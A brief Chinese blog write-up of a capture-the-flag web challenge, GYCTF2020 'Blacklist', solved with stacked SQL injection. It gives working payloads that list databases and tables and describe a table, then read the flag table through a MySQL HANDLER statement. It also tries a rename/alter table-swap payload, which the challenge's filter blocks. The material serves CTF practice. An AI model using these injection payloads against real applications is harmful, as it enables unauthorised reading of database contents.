BUUCTF [web专项31][GYCTF2020]Blacklist

坏了,好熟悉的感觉,好像之前做过类似的题目,甚至大致模板都一样

找到了:BUUCTF [web专题7] [强网杯 2019]随便注-CSDN博客

我记得是用堆叠注入来获取库表之类的

而且只能获取1,2的数据,其他数据(数字,字符等)全都不显示好像

查库

1';show databases;

再爆表

1';show tables;#

出来了,进入FlagHere

1';desc FlagHere;#

flag就在这里

我记得原本我总结了两种方法,一种是用handler获取flag,另一种是替换words的数据来进行输出获取flag

第一种:handler

1';handler FlagHere open as a;handler a read next;#

出现flag

第二种:顶替words来输出数据

1';rename table words to test;rename table FlagHere to words;alter table words add id int unsigned;alter table words change flag data varchar(100);#

ok了,rename,alter被过滤掉了,第二种方法不行,还是用handler吧

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值